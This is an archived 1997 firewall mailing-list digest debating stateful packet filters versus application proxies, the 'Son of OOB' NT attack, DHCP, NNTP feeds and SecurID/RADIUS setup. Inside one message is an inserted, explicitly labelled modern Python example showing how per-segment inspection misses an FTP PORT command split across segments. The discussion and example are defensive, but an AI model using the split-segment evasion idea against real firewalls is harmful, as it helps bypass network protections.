since the proxy handles all outbound connections, and doesn't pass packets through, it is the only machine on the network that needs to not be vulnerable to the attack. > In general, a proxy will not protect you against attacks > that didn't exist or weren't know at the time it was written. In this case, since the attack is against the stack of the clients, and not the firewall itself, or an application, my proxy protects me where SPF doesn't protect you. Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." 
PSB#9280 From owner-firewalls-outgoing Mon Jun 9 21:57:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA29854 for firewalls-outgoing; Mon, 9 Jun 1997 20:44:40 -0700 (PDT) Received: from unixpac10.unixpac.com.au (unixpac10.unixpac.com.au [203.3.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id UAA29747 for ; Mon, 9 Jun 1997 20:44:18 -0700 (PDT) Received: from unix10.unixpac.com.au by unixpac10.unixpac.com.au via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 03:57:40 UT Received: from www.jlabs.com (unixpac1.unixpac.com.au [192.168.200.177]) by unix10.unixpac.com.au (8.8.2/8.8.2) with SMTP id NAA28599 for ; Tue, 10 Jun 1997 13:46:40 +1000 (EST) To: firewalls@greatcircle.com Path: newsmaster From: geoffb@NOJUNKunixpac.com.au (Geoff Breach) Newsgroups: unixpac.lists.firewalls Subject: Re: Simple firewall? Date: Tue, 10 Jun 1997 03:44:55 GMT Organization: Unixpac Pty Ltd, Sydney, Australia, +612 9953 8366 Lines: 19 Message-ID: <339ccce7.683444814@news> References: <01A1542B@MHS> NNTP-Posting-Host: disney.unixpac.com.au X-Newsreader: Forte Free Agent 1.1/32.230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 09 Jun 1997 22:31:43 -0400, Brown_Michael_K@bns.attmail.com wrote: >If someone just wants to only allow email into their network, perform >NAT(since they are not registered legal internal addresses) and allow >internal users to surf the internet using http, what is the most >economical and still secure way/product to do this? Whistle Interjet? All you ask for plus public and private web and ftp sites, file server, mailing list management, DHCP, WINS, DNS, SMB, etc, etc, etc. Security wise: It's based on FreeBSD, ipfw and GateD. It's essentially a packet filtering, address hiding router. 
http://www.unixpac.com.au/vendors/whistle/index.html HTH, Geoff From owner-firewalls-outgoing Mon Jun 9 22:10:40 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA19743 for firewalls-outgoing; Mon, 9 Jun 1997 20:02:16 -0700 (PDT) Received: from unixpac10.unixpac.com.au (unixpac10.unixpac.com.au [203.3.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id UAA19710 for ; Mon, 9 Jun 1997 20:02:05 -0700 (PDT) Received: from unix10.unixpac.com.au by unixpac10.unixpac.com.au via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 03:15:26 UT Received: from www.jlabs.com (unixpac1.unixpac.com.au [192.168.200.177]) by unix10.unixpac.com.au (8.8.2/8.8.2) with SMTP id NAA27910 for ; Tue, 10 Jun 1997 13:04:23 +1000 (EST) To: firewalls@greatcircle.com Path: newsmaster From: geoffb@NOJUNKunixpac.com.au (Geoff Breach) Newsgroups: unixpac.lists.firewalls Subject: Re: DHCP and Firewall 1 Date: Tue, 10 Jun 1997 03:02:38 GMT Organization: Unixpac Pty Ltd, Sydney, Australia, +612 9953 8366 Lines: 25 Message-ID: <339cc303.680912366@news> References: <9706092044.AA02756@ny_nx_mail1.ncmi-gsl.com> NNTP-Posting-Host: disney.unixpac.com.au X-Newsreader: Forte Free Agent 1.1/32.230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 9 Jun 97 16:44:44 -0400, donaldb@ncmi-ny.com (Donald Branch) wrote: >I have a Windows NT machine running DHCP I want to be able from >that one machine to be able to get out to AOL but since it's ip >address keeps changing I can't make a rule based on his ip address. >keeps changing Only one way. Keep it's IP address from changing. If you configure your DHCP server to always hand out the same address to that machine's MAC address, you get a middle ground between the benefits of DHCP and the benefits of fixed addressing. 
You still get all the nice information handout features of DHCP (default gw, DNS servers, etc,etc), you get central control over addressing and all that info, and you get fixed addresses for the benefit of fine-grained control over what individual boxen do through your firewall. Yeah, there are other ways, authenticate, etc, but too much trouble IMHO. HTH Geoff From owner-firewalls-outgoing Mon Jun 9 22:26:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA07810 for firewalls-outgoing; Mon, 9 Jun 1997 18:53:52 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA07509 for ; Mon, 9 Jun 1997 18:52:52 -0700 (PDT) Received: from apu.rcp.net.pe (apu.rcp.net.pe [161.132.5.16]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id SAA26457 for ; Mon, 9 Jun 1997 18:28:34 -0700 (PDT) Received: by apu.rcp.net.pe via sendmail with stdio id for firewalls@greatcircle.com; Mon, 9 Jun 1997 20:20:15 -0400 (EDT) (Smail-3.2 1996-Jul-4 #1 built 1996-Sep-16) Message-Id: From: vadillo@apu.rcp.net.pe (Enrique Vadillo) Subject: SecurID and Cisco? To: firewalls@greatcircle.com Date: Mon, 9 Jun 1997 20:20:15 -0400 (EDT) PGP-FingerPrint: 55 B9 83 D2 61 71 E6 6B 1E CE FD B5 F7 AA F1 B5 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Sorry if this can look kinda off-topic. I am trying to obtain SecurID dialup authentication working thru Cisco 2511. I am using a Solaris Box as radiusd server (Latest Ascend's radiusd compiled with ACE libs) and ACE Server (SecurID) host too. Authentication using the "UNIX Client" works fine. BTW i am using user-defined PIN numbers. The problem appears only with the "Communications Client". 
I have inserted in the '/etc/raddb/users' file the following lines: aceuser Password = "ACE" User-Service-Type = Framed-User In my Cisco the Solaris box is defined as the radius server. When i try to authenticate using a "Communications Client" (My Solaris again), i execute "/etc/radiusd -s -x" and for an 'aceusr' login attempt in my Cisco 2511 i get the following message: Jun 10 01:51:01.744 radiusd[2149] Debugging enabled Jun 10 01:51:01.760 radiusd[2149] config_init: dict_valfind(Lifetime-In-Days) failed Jun 10 01:51:39.622 radiusd[2149] New request: securid.1645, id=49 Jun 10 01:51:39.624 radiusd[2149] handle_radius_request: securid.1645, id=49, code=1, length=75 request: Client-Id = 161.132.6.134 <<=== THIS IS MY CISCO 2511 request: Client-Port-Id = 18 request: User-Name = "aceusr" request: Calling-Station-Id = "200.1.182.200" <<=== THIS IS THE REMOTE HOST request: Password = "\025\263\213\215+\226r\332\342=\017\341\302\306];" Jun 10 01:51:39.628 radiusd[2149] rad_authenticate Jun 10 01:51:39.639 radiusd[2149] User record PASSWORD type is Token Jun 10 01:51:39.640 radiusd[2149] authPapPwd Jun 10 01:51:39.641 radiusd[2149] ace_pass: FAILED: no state attribute Jun 10 01:51:39.644 radiusd[2149] ace_pass: securid.1645, id=49: FAILED for user `aceusr' Jun 10 01:51:39.646 radiusd[2149] send_reject: securid.1645, id=49 Of course 'aceusr' is included in the "User Activation List" for this client. has anyone out there succeeded running SecurID using Cisco? 
Enrique Vadillo- From owner-firewalls-outgoing Mon Jun 9 22:53:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA23725 for firewalls-outgoing; Mon, 9 Jun 1997 17:49:01 -0700 (PDT) Received: from unixpac10.unixpac.com.au (unixpac10.unixpac.com.au [203.3.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA23649 for ; Mon, 9 Jun 1997 17:48:41 -0700 (PDT) Received: from unix10.unixpac.com.au by unixpac10.unixpac.com.au via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 01:02:00 UT Received: from www.jlabs.com (unixpac1.unixpac.com.au [192.168.200.177]) by unix10.unixpac.com.au (8.8.2/8.8.2) with SMTP id KAA25861 for ; Tue, 10 Jun 1997 10:51:00 +1000 (EST) To: firewalls@greatcircle.com Path: newsmaster From: geoffb@NOJUNKunixpac.com.au (Geoff Breach) Newsgroups: unixpac.lists.firewalls Subject: Re: NNTP server in DMZ? Date: Tue, 10 Jun 1997 00:49:13 GMT Organization: Unixpac Pty Ltd, Sydney, Australia, +612 9953 8366 Lines: 52 Message-ID: <339ca21f.672491035@news> References: <3.0.2.32.19970607194048.029fd084@localhost> NNTP-Posting-Host: disney.unixpac.com.au X-Newsreader: Forte Free Agent 1.1/32.230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 07 Jun 1997 19:40:48 -0400, timh@nac.net ("Timothy D.J. Hunt") wrote: >At 07:55 AM 6/5/97 -0500, Joe Doetzl wrote: >>I have a customer who wishes to install a NNTP server. It is likely >>that they will host internal newsgroups that will need to be protected. >The problem with the standard news feed is that the standard "IHAVE" >protocol is a "push" feed >with the sender connecting to your server. For this to work, your >news server would need to be in the DMZ. The other catch with a "push" feed in both directions is that, unless your ISP sets up some means for you to control the feed (gup, etc) then you need to call them each time you want changes, etc. 
A "pull" feed is arguably harder on the server you're pulling from than allowing it to feed you at will, but it's more secure, and gives you control over what you get, *and* gets you out of your ISP's hair. I've just set up an INN-like server (Nutscrape) on my internal network, but 'cos my ISP didn't get his act together quick enough, I wrote my own pull feed. One perl script that reads the active file for a list of what it should go get, then calls nntpget for each newsgroup with date/time parameters it gets from it's own database forms the basis of the down "pull". A second script reads the spool list for the upstream news server (that INN tries to contact, but cannot) and plucks out the articles from the local spool and posts them back upstream aka regular nntp client. Security wise, the INN server sits on my internal RFC1597 network, and the firewall and router have been configured to allow NNTP client access from only the internal news server and to only my ISP's news server. The firewall uses a simple plug-gw like proxy to pass the traffic. Feels nice and safe to me, and it works, with maybe a 5 min delay before the postings hit the street, which is pretty much standard anyway... For what my opinion is worth, the Nutscrape News Server seems pretty brain dead and inconfigurable to me, but the one thing I did like was it sent all that recent rash of "cmsg sendsys" and "send-me-your-passwd-file" control postings to me and said "Do we really wanna send our passwd file to this guy?" 
out of the box :-) HTH Geoff From owner-firewalls-outgoing Mon Jun 9 22:55:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08114 for firewalls-outgoing; Mon, 9 Jun 1997 13:39:58 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08048 for ; Mon, 9 Jun 1997 13:39:33 -0700 (PDT) Received: from clark.net (proberts@explorer.clark.net [168.143.0.7]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id QAA22102; Mon, 9 Jun 1997 16:39:39 -0400 (EDT) Received: from localhost (proberts@localhost) by clark.net (8.8.5/8.7.1) with SMTP id QAA07652; Mon, 9 Jun 1997 16:40:06 -0400 (EDT) X-Authentication-Warning: clark.net: proberts owned process doing -bs Date: Mon, 9 Jun 1997 16:40:03 -0400 (EDT) From: "Paul D. Robertson" To: Ryan Russell/SYBASE cc: firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706092011.NAA18271@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 9 Jun 1997, Ryan Russell/SYBASE wrote: > Yes, I don't believe the SPFs will fragment, keep > seperate window sizes, etc.. Unless the layer 2 networks > on each size are significantly different. This means that NT machines behind SPFs are vulnerable to "Son of OOB" type attacks, not so proxy protected machines behind a non-NT proxy. > No, I don't think that there is anything an SPF > can block (in the data stream) that a proxy > can't. But, I will claim that the opposite is true, too. Covert channels in, leaking data in ICMP packets, which would require an proxy-aware version of say, ping, on an application layer gateway. Also, a whole class of DOS attacks against the stacks of the "protected" clients are what spring to my mind immediately. > A SPF has all the same access to a data stream > that a proxy does. 
One could write some SPF > code that would block applets. Would you > want to? Probably not. It would probably be easier > with a traditional proxy. Yes, and eventually, you'd have a real *mess* of code if you tried to mirror application layer functionality. Then think about verifying the implementation. If it's the first TCP fragment, and the sequence number is valid, and the window size is good, and the IP options aren't set, and we haven't seen a
 tag, and it's text/html, and .....  

This sort of endless nested loop complexity is what you don't want in
security code.  Especially given the fact that you must protect against
attacks at multiple layers.  By the time you add enough to an SPF to
protect against all this, you've increased the level of complexity of the
code base by an order of magnitude, and you haven't gained any security 
over an application layer gateway because of it.

Yes, it's possible to add the same level of protection, but as you state,
it's probably something you wouldn't want to do.  Application layer
gateways gain those types of protections easily, understandably, and by
virtue of design, not by thousands of extra lines of code any one of which
could leave a hole.


Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280


From owner-firewalls-outgoing  Mon Jun  9 23:11:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA27756 for firewalls-outgoing; Mon, 9 Jun 1997 15:45:17 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA27598 for ; Mon, 9 Jun 1997 15:44:40 -0700 (PDT)
Message-Id: <199706092244.PAA27598@honor.greatcircle.com>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA060735962; Tue, 10 Jun 1997 08:39:22 +1000
From: Darren Reed 
Subject: Re: Stateful Packet Filters vs. Proxies
To: mike.jones@unifiedtech.com (Mike Jones)
Date: Tue, 10 Jun 1997 08:39:21 +1000 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <339C1C2E.F67342F@unifiedtech.com> from "Mike Jones" at Jun 9, 97 11:07:26 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Mike Jones, sie said:
> 
> I'm not entirely sure what you're trying to say here. Why would
> you want Gauntlet to work with FW1? Is it that someone behind
> a FW1 could not ftp to a server behind a Gauntlet?

Ask those who were doing it.  Just more layers.

> Be that as it may, this was a bug and it was fixed. It was *not*
> a security hole, in that it did not permit something that should
> have been denied.

It was one instance of the bug.

> > The point being, FW1 doesn't try to recreate the upper layers of data
> > properly, so anything which doesn't fit in one packet requires them to
> > provide "special case handling".  What they (and consumers) don't seem
> > to
> > realise that all of TCP is a "special case".  Consequently, their
> > entire
> > suite of TCP proxies could be considered to be "flawed". 
> > If you're curious about "how", then look at the Linux FTP masquerade
> > code - it too looks for everything in one packet (when I last looked).
> 
> I don't follow you at all, I'm afraid. You're concluding that the
> entire product is flawed based on theoretically projecting one
> actual bug. I'm rather more interested in real security flaws. Your
> original message indicated multiple flaws and multiple cases
> pointing them out. This is a common claim, but whenever I've asked
> for details it always seems to turn into anecdotal evidence. I've
> always been a believer in the principle that the plural of "anecdote"
> is not "data", so I remain curious, but unconvinced.

Well, it strongly suggests that all of their TCP code (be it FTP/HTTP
or TELNET) is not written to handle cases where all the data it wants
to check is not in the same packet.

Whether or not that is a security flaw most likely will depend on your
firewall.  The area in which it has been observed to fail is when it
examines actual data (not TCP/IP headers) in packets.  When is that
needed and when isn't it ?  Depends on your firewall.  Given the original
description of the problem, with FTP, it is most likely trivial to find
other cases (or even the same) which cause the product to fail.

I guess this is a case of "if we had the source code, we could check to
see if it would or wouldn't work."  Instead we have to rely on Checkpoint's
marketing gloss.

If you've got a proper understanding of all that is involved with TCP/IP,
it's not hard to imagine how FW1 might "cheat" and how it could break down.
If nobody had ever had a problem, then we might never have known for sure,
but we have seen one case which therefore casts doubt over the rest of the
product.  This "cheating" I'd call a flaw - a flaw you don't have to even
wonder about when using traditional application proxies.

Darren
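The split-command case Darren describes, as an added example that is not part of the thread or of any product's code: a constructed FTP control-channel exchange inspected segment by segment, then by a small line reassembler of the kind the kernel provides to a proxy. The function names, the sample bytes and the line-length cap are assumptions.

```python
"""Added example (not from the thread): why per-segment inspection of a
TCP stream misses a command that spans two segments, and what a
stream-reassembling inspector does instead."""
import re

# FTP "PORT h1,h2,h3,h4,p1,p2" as sent on the control channel.
PORT_RE = re.compile(rb"PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\r\n")
MAX_LINE = 512  # assumed cap so a never-terminated line cannot grow the buffer forever


def parse_port(match):
    """Turn a PORT match into the (ip, port) a firewall would pin-hole."""
    h = [int(x) for x in match.groups()]
    return "%d.%d.%d.%d" % tuple(h[:4]), h[4] * 256 + h[5]


def per_packet_inspector(segments):
    """The approach the thread criticises: each segment is examined on its
    own, so a command is only recognised when it is whole in one segment.
    Returns the (ip, port) pairs found."""
    found = []
    for payload in segments:
        for m in PORT_RE.finditer(payload):
            found.append(parse_port(m))
    return found


class StreamInspector:
    """Reassembles the byte stream and parses only complete CRLF-terminated
    lines, so segment boundaries no longer matter.  A real reassembler also
    orders segments by sequence number; that is omitted here."""

    def __init__(self):
        self.buf = b""
        self.found = []

    def feed(self, payload):
        self.buf += payload
        while b"\r\n" in self.buf:
            line, _, self.buf = self.buf.partition(b"\r\n")
            m = PORT_RE.match(line + b"\r\n")
            if m:
                self.found.append(parse_port(m))
        if len(self.buf) > MAX_LINE:
            raise ValueError("control line too long; refusing to buffer")
        return self.found


# Constructed sample: the same command delivered whole, then split across
# two segments as a small MSS or a retransmit could do.
WHOLE = [b"USER anonymous\r\n", b"PORT 172,17,30,13,4,1\r\n"]
SPLIT = [b"USER anonymous\r\nPORT 172,17,", b"30,13,4,1\r\n"]


def compare():
    """Return what each inspector sees for the whole and split deliveries."""
    stream = StreamInspector()
    for seg in SPLIT:
        stream.feed(seg)
    return {
        "per_packet_whole": per_packet_inspector(WHOLE),
        "per_packet_split": per_packet_inspector(SPLIT),
        "stream_split": list(stream.found),
    }


if __name__ == "__main__":
    for name, result in compare().items():
        print(name, result)
```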

From owner-firewalls-outgoing  Mon Jun  9 23:25:23 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA28257 for firewalls-outgoing; Mon, 9 Jun 1997 20:37:29 -0700 (PDT)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id UAA28079 for ; Mon, 9 Jun 1997 20:36:52 -0700 (PDT)
Received: from splinter.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02)
	id AA12736; Mon, 9 Jun 1997 23:37:41 -0400
Received: by splinter.rtp.dg.com (8.6.10/200.15.1.2)
	id XAA10392; Mon, 9 Jun 1997 23:38:17 -0400
From: spencerj@dg-rtp.dg.com (Jon Spencer)
Message-Id: <199706100338.XAA10392@splinter.rtp.dg.com>
Subject: Re: Ethical problems...
To: smoothy@videotron.ca (Smoothy)
Date: Mon, 9 Jun 1997 23:38:13 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199706092040.QAA04207@bizet.videotron.net> from "Smoothy" at Jun 9, 97 04:44:01 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There need not be any conflicts between functionality and security goals of
the type illustrated below.  Whether there are or not depends upon the
technology employed on the firewall.

Using the example below, checking the email for a virus does indeed require
the decryption of the message.  Not only could you violate the
confidentiality of the message, you could also destroy the authenticity of
the sender (by messing with the digital signature).

The solution provided by CYBERSHIELD (actually provided by the underlying
B2 DG/UX OS) is to approach this in one of two manners.  Both are based
upon the principle of containment, which, simply stated, divides the system
into two parts:  that which exists for the subject, and that which does not
exist for the subject.  Arbitrary "containment areas" can be established.

(1) establish a containment area (CA) which no user or administrator can
    access.  Perform the decryption in that CA, and reencrypt the message
    prior to moving it out of that area.

    OR

(2) establish a containment area for receipt of network and/or email entities
    for each user.  Handle the mail in that CA.  This method allows for
    greater flexibility of personalization, better integrity and
    confidentiality of keys, etc.

In any event, an underlying high assurance protection approach is required
to ensure that the security goal is truly met and cannot be violated.  This
is certainly not the case for most firewall products, so the compilation of
the list is in general quite useful.

It will be interesting to see if you get any conflicts which can't be
eliminated by containment.  Flames from those who don't understand high
assurance or non-overridable security policies will be gleefully ignored! :-)

> 
> Hello,
> 
> I'm presently looking to establish which confusions all the security
> mechanisms can involve in opposition with the ethics.  If any ideas came
> to your mind...would u please send it to my email address :
> smoothy@videotron.ca.
> 
> Example:  lot of firewalls need to decrypt a mail for checking viruses
> in, but it's directly in opposition of the confidentiality.
> 
> Tx to all of u !
> 
> Stéphane Routhier
> Bombardier Inc. Division Sea-Doo/Ski-doo
> 


-- 
Jon F. Spencer				spencerj@rtp.dg.com 
Data General Corp.			Phone : (919)248-6246
62 Alexander Drive, MS #119		FAX   : (919)248-6108
Research Triangle Park, NC  27709	Office RTP 121/9

	There is no such thing as a small interference with property.
			Andrew J. Galambos

	No success can compensate for failure in the home.
			President David O. McKay

***** UCC 1-207 ********

From owner-firewalls-outgoing  Tue Jun 10 00:04:54 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA26980 for firewalls-outgoing; Mon, 9 Jun 1997 18:03:11 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA26973 for ; Mon, 9 Jun 1997 18:03:05 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id SAA03276 for ; Mon, 9 Jun 1997 18:07:18 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA22691; Mon, 9 Jun 97 18:05:08 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id SAA04291 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 18:03:56 -0700 (PDT)
Message-Id: <199706100103.SAA04291@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  860E878C7D5ACB0F882564B200059E48; Mon,  9 Jun 97 18:03:55 EDT
To: "Paul D. Robertson" 
Cc: firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 18:10:39 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just to clear up some of your misconceptions:

The son of OOB attack is application specific,
affecting only the Microsoft DNS server and the 
Microsoft Service at port 139 (which I think is the
NetBIOS port, not sure.)  It does not affect the
TCP driver in general.

The OOB flag is a perfectly legitimate flag, used by
a number of protocols, and a firewall of any type would have
had no reason to filter it until the attack was discovered.  
Any proxy for those services would quite happily pass
it on inside to any host in your network.

Think of it this way.. Say I discover that if I throw the
word "fred" into the datastream of an HTTP connection
Netscape will delete your hard drive.  You're telling me
that there are proxies out there that automatically
filter out the word fred?  Before I announce the attack?

That's gotta suck if you have a homepage, and your name
is fred.

    Ryan

P.S. Take a look here for an explanation of
what the Son of OOB bug is:

http://www.geek-girl.com/bugtraq/1997_2/0319.html



---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: proberts@clark.net ("Paul D. Robertson") @ smtp
Date: 06/09/97 08:45:25 PM
Subject: Re: Stateful Packet Filters vs. Proxies

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> >This means that NT machines behind SPFs are vulnerable to "Son of OOB"
> >type attacks, not so proxy protected machines behind a non-NT proxy.  
> 
> A proxy would have to be written specifically to handle the OOB problem,
> it would not be handled automatically.  It would probably be easier

Wrong, the protections of a "hardened host" for OOB problems are included
because you aren't passing the problem to the other hosts.  One machine,
or several thousand, I know which I find easier to keep updated and
protected.

> to modify the SPF to catch it, actually.  Imagine if you were using the
> host OS, and your proxy depended to some degree on the NetBIOS
> over TCP implementation in NT - then your proxy would get nailed
> by the OOB attack, and not the inside machine.

1. I said "non-NT" firewall, in which case I'm *not* nailed.

2. I said "Son of OOB", which is pertinent to *any* TCP connection with
NT, _not_ just NetBIOS services.  It's not a proxy issue because it's a
lower level attack, since the proxy handles all outbound connections, and
doesn't pass packets through, it is the only machine on the network that
needs to not be vulnerable to the attack.

> In general, a proxy will not protect you against attacks
> that didn't exist or weren't known at the time it was written.

In this case, since the attack is against the stack of the clients, and
not the firewall itself, or an application, my proxy protects me where
SPF doesn't protect you.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280





From owner-firewalls-outgoing  Tue Jun 10 00:26:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA14374 for firewalls-outgoing; Mon, 9 Jun 1997 17:05:10 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA14273 for ; Mon, 9 Jun 1997 17:04:45 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id QAA18862 for ; Mon, 9 Jun 1997 16:07:35 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA07361; Mon, 9 Jun 97 16:05:26 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id QAA28403 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 16:04:15 -0700 (PDT)
Message-Id: <199706092304.QAA28403@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  F3493988977A4D79882564B1007E18B1; Mon,  9 Jun 97 16:04:13 EDT
To: "Paul D. Robertson" 
Cc: Ryan Russell/SYBASE ,
        firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 16:09:09 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>This means that NT machines behind SPFs are vulnerable to "Son of OOB"
>type attacks, not so proxy protected machines behind a non-NT proxy.  

A proxy would have to be written specifically to handle the OOB problem,
it would not be handled automatically.  It would probably be easier
to modify the SPF to catch it, actually.  Imagine if you were using the
host OS, and your proxy depended to some degree on the NetBIOS
over TCP implementation in NT - then your proxy would get nailed
by the OOB attack, and not the inside machine.

In general, a proxy will not protect you against attacks
that didn't exist or weren't known at the time it was written.

    Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: proberts@clark.net ("Paul D. Robertson") @ smtp
Date: 06/09/97 04:40:03 PM
Subject: Re: Stateful Packet Filters vs. Proxies

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> Yes, I don't believe the SPFs will fragment, keep
> separate window sizes, etc.. Unless the layer 2 networks
> on each side are significantly different.

This means that NT machines behind SPFs are vulnerable to "Son of OOB"
type attacks, not so proxy protected machines behind a non-NT proxy.  

> No, I don't think that there is anything an SPF 
> can block (in the data stream) that a proxy
> can't.  But, I will claim that the opposite is true, too.

Covert channels in, leaking data in ICMP packets, which would
require a proxy-aware version of say, ping, on an application layer
gateway.  Also, a whole class of DOS attacks against the stacks of the
"protected" clients are what spring to my mind immediately.  

> A SPF has all the same access to a data stream 
> that a proxy does.  One could write some SPF
> code that would block applets.  Would you
> want to?  Probably not.  It would probably be easier
> with a traditional proxy.

Yes, and eventually, you'd have a real *mess* of code if you tried to
mirror application layer functionality.  Then think about verifying the
implementation.  If it's the first TCP fragment, and the sequence number
is valid, and the window size is good, and the IP options aren't set, and
we haven't seen a 
 tag, and it's text/html, and .....  

This sort of endless nested loop complexity is what you don't want in
security code.  Especially given the fact that you must protect against
attacks at multiple layers.  By the time you add enough to an SPF to
protect against all this, you've increased the level of complexity of the
code base by an order of magnitude, and you haven't gained any security 
over an application layer gateway because of it.

Yes, it's possible to add the same level of protection, but as you state,
it's probably something you wouldn't want to do.  Application layer
gateways gain those types of protections easily, understandably, and by
virtue of design, not by thousands of extra lines of code any one of which
could leave a hole.


Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280





From owner-firewalls-outgoing  Tue Jun 10 00:42:37 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA00999 for firewalls-outgoing; Mon, 9 Jun 1997 18:21:12 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA00846 for ; Mon, 9 Jun 1997 18:20:40 -0700 (PDT)
Message-Id: <199706100120.SAA00846@honor.greatcircle.com>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA121965309; Tue, 10 Jun 1997 11:15:09 +1000
From: Darren Reed 
Subject: Re: Stateful Packet Filters vs. Proxies
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Tue, 10 Jun 1997 11:15:09 +1000 (EST)
